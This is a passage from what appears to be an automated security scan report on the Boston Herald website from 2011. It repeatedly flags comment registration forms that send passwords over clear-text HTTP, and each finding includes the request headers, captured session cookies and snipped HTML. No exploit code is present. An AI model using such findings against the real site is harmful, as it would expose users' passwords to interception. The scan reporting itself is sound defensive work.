Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:09:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.5. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.6. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.7. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 98783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.8. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.9. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:21:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.10. http://www.bostonherald.com/news/regional/view.bg

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:38:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.11. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.12. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.13. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.14. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96220

